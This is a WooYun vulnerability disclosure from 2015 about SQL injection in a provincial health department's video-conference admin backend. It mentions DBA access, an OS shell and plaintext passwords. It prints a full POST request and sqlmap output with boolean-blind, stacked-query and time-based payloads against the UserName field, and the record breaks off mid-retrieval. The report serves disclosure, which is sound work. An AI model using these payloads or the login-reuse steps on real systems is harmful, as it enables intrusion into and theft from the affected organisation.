当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137909

漏洞标题:某省卫生厅视频会议网上直播后台多处SQL注入(DBA权限+OS-SHELL访问+密码明文)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-03 11:55

修复时间:2015-10-21 08:54

公开时间:2015-10-21 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-03: 细节已通知厂商并且等待厂商处理中
2015-09-06: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

漏洞未修复,借用用户登录后台,存在多处漏洞!~~~~

详细说明:

1、
首先我看到了如下漏洞
http://**.**.**.**/bugs/wooyun-2015-0125437
洞主仅仅只是列出了漏洞,但却没有说明他的危害
但是测试发现DBA权限,而且可以查看系统文件,权限之高,是不是就可以添加用户,开放3389,然后控制电脑等等???

1.jpg


密码直接明文

4.jpg


来测试--os-shell,权限为管理员权限

7.jpg


8.jpg


继续测试,用管理员和明文密码登录到后台
发现几个地方有搜索,测试之。
2、后台第一处,UserName存在注入

**.**.**.**:65493/genmedia/Modules/frmUser.aspx (POST)
__VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291b
nQCL2QWAmYPZBYiAgEPZBYQZg8PFgIeBFRleHQFAjQ4ZGQCAQ8PFgIfAgUEdGVzdGRkAgIPDxYCHwIFCDNAcXEuY29tZGQCA
w8PFgIfAgUSMjAxNS84LzI5IDIyOjMyOjE0ZGQCBA8PFgIfAgUSMjAxNS84LzI5IDIyOjMyOjMwZGQCBQ8PFgIfAgUG5q2j5bi4ZGQ
CBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIeD0NvbW1hbmRBcmd1bWVudAUCNDhkZAICD2QWEGYPDxYCHwIFAjQ3ZG
QCAQ8PFgIfAgUBJ2RkAgIPDxYCHwIFBydAJy5jb21kZAIDDw8WAh8CBRIyMDE1LzgvMjYgMTU6MjI6NDZkZAIEDw8WAh8CBRIyM
DE1LzgvMjYgMTU6MjM6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI
0N2RkAgMPZBYQZg8PFgIfAgUCNDZkZAIBDw8WAh8CBQnpu4Tlvrfog5xkZAICDw8WAh8CBQpoZHMzMjcwMjI2ZGQCAw8PFgI
fAgURMjAxNS82LzEyIDk6MDk6MjhkZAIEDw8WAh8CBREyMDE1LzYvMTIgOTowOTo1MGRkAgUPDxYCHwIFBuato
%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQ2ZGQCBA9kFhBmDw8WAh8CBQI0NWRkAgEPDxYCHwIFBndqamt6eGRkAgIPDxYCH
wIFEHd1amluY2RjQDE2My5jb21kZAIDDw8WAh8CBRIyMDE0LzgvMTkgMTA6MzU6MzNkZAIEDw8WAh8CBRIyMDE0LzgvMTkg
MTA6MzU6NDlkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI0NWRkAgUPZB
YQZg8PFgIfAgUCNDRkZAIBDw8WAh8CBQblhYnlpLRkZAICDw8WAh8CBRZzaGlsZWlfMTk4NjExQHNpbmEuY29tZGQCAw8PFgIf
AgURMjAxNC84LzE5IDk6MTU6NDNkZAIEDw8WAh8CBREyMDE0LzgvMTkgOTozMjo1MWRkAgUPDxYCHwIFBuato
%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQ0ZGQCBg9kFhBmDw8WAh8CBQI0M2RkAgEPDxYCHwIFCWhhaWJhb18xMWRkAgIP
DxYCHwIFEGhmbGl1XzExQDE2My5jb21kZAIDDw8WAh8CBRIyMDE0LzgvMTggMTI6MDA6MzNkZAIEDw8WAh8CBRIyMDE0Lzgv
MTggMTI6MDA6NTNkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI0M2RkAg
cPZBYQZg8PFgIfAgUCNDJkZAIBDw8WAh8CBQhoYWlhbndzamRkAgIPDxYCHwIFEDM3OTczNzU0NkBxcS5jb21kZAIDDw8WAh8
CBREyMDE0LzgvMTIgOTo1MDoyNmRkAgQPDxYCHwIFETIwMTQvOC8xMiA5OjUxOjEyZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8P
FgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwUCNDJkZAIID2QWEGYPDxYCHwIFAjQxZGQCAQ8PFgIfAgUP5pWm5LmJ5Y2r55
Sf6ZmiZGQCAg8PFgIfAgUGJm5ic3A7ZGQCAw8PFgIfAgUQMjAxNC84LzQgOTo0OToyNmRkAgQPDxYCHwIFBiZuYnNwO2RkAg
UPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQxZGQCCQ9kFhBmDw8WAh8CBQI0MGRkAgEPDxYCHwIFHuazsOW3nuW4guS4reilv
%2BWMu%2Be7k%2BWQiOWMu
%2BmZomRkAgIPDxYCHwIFEmRyLnh1IDA1MjNAMTYzLmNvbWRkAgMPDxYCHwIFEDIwMTQvOC80IDk6MDM6MTFkZAIEDw8
WAh8CBREyMDE0LzkvNSAxMDowNDo0NmRkAgUPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQwZGQCCg9kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQC
Ag8PFgIfAgUONzk1MjI0MkBxcS5jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgO
TozMTo0MmRkAgUPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCCw9kFhBmDw8WAh8CBQIzOGRkAgEPDxYCHwIFCGNodXlpbGVpZGQCAg8P
FgIfAgUPNTk4MDEwMDRAcXEuY29tZGQCAw8PFgIfAgUQMjAxNC84LzIgOTo0ODo1MmRkAgQPDxYCHwIFEDIwMTQvOC8yIDk
6NDk6MTRkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzOGRkAgwPZBYQZ
g8PFgIfAgUCMzdkZAIBDw8WAh8CBQdjdWloNDE2ZGQCAg8PFgIfAgUOY2g3NzA0MUBxcS5jb21kZAIDDw8WAh8CBRIyMDE0Lz
cvMzEgMTY6MTE6MTJkZAIEDw8WAh8CBRIyMDE0LzcvMzEgMTY6MTI6MjVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CB
Qbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzN2RkAg0PZBYQZg8PFgIfAgUCMzZkZAIBDw8WAh8CBQtwYW5taW5nMTIzMWR
kAgIPDxYCHwIFEDQ2MjA5Mjg1N0BxcS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTc6MjQ6MzlkZAIEDw8WAh8CBRIyMDE0L
zcvMjkgMTc6MjQ6NTdkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzNmRk
Ag4PZBYQZg8PFgIfAgUCMzVkZAIBDw8WAh8CBQlxaWFua3VuOTlkZAICDw8WAh8CBRA3NTQ5ODk4MzNAcXEuY29tZGQCAw8
PFgIfAgUSMjAxNC83LzI5IDE1OjI1OjE2ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE1OjI2OjEzZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8
PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwUCMzVkZAIPD2QWEGYPDxYCHwIFAjM0ZGQCAQ8PFgIfAgUHbmpsY3dzeWR
kAgIPDxYCHwIFDWxjd3N5QDEyNi5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MTc6MzNkZAIEDw8WAh8CBRIyMDE0Lzcv
MjkgMTU6MTg6NDNkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzNGRkAh
APDxYCHgdWaXNpYmxlaGRkAhEPZBYCZg9kFggCAQ8PFgIfAgUBMWRkAgMPDxYCHwIFATRkZAIFDw8WAh4HRW5hYmxlZGhk
ZAIHDw8WAh8FaGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAApkZ
GRkZGQVAQZVc2VySUQUKwAPFCsAAQIwFCsAAQIvFCsAAQIuFCsAAQItFCsAAQIsFCsAAQIrFCsAAQIqFCsAAQIpFCsAAQIoFCsA
AQInFCsAAQImFCsAAQIlFCsAAQIkFCsAAQIjFCsAAQIiAgQUKwABAjBkk9Gt195rbHxqZqPny1qj37TW2yU
%3D&__EVENTVALIDATION=/wEWOgKk0%2BWuDQKvruq2CALgq6f3DwL/q6f3DwL
%2Bq6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLpAQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK2
9YKwBQK29YawBQK59db/CwK59c7/CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKk
BgK09dakBgK39eaCDQK39d6CDQK39eqCDQLdu%2BCrBALdu%2BirBALdu
%2BSrBALcu4yLCwLcu4SLCwLcu4iLCwLeu/jpAQLeu/DpAQLeu/zpAQLhu%2BTACALhu%2BzACALhu
%2BDACALbu/CvBQLbu/ivBQLbu/SvBQLau9z/CwLau9T/CwLau9j/CwLcu4juAgLcu4DuAgLcu4zuAgKmqMHSBwL31dWUBgLflITA
DgKE58WOCJLgTGwcJHLjP7zficLBTQ413AEq&UserName=1&comboStatus=0&comboOnline=0&UserList
$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12


---
Place: POST
Parameter: UserName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%' AND 7285=7285 AND '%'='&comboStatus=0&comboOnline=0&Us
erList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%'; WAITFOR DELAY '0:0:5'--&comboStatus=0&comboOnline=0&U
serList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%' WAITFOR DELAY '0:0:5'--&comboStatus=0&comboOnline=0&Us
erList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
---
[01:52:32] [INFO] testing Microsoft SQL Server
[01:52:32] [INFO] confirming Microsoft SQL Server
[01:52:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[01:52:32] [INFO] fetching current user
[01:52:32] [INFO] retrieving the length of query output
[01:52:32] [INFO] retrieved:
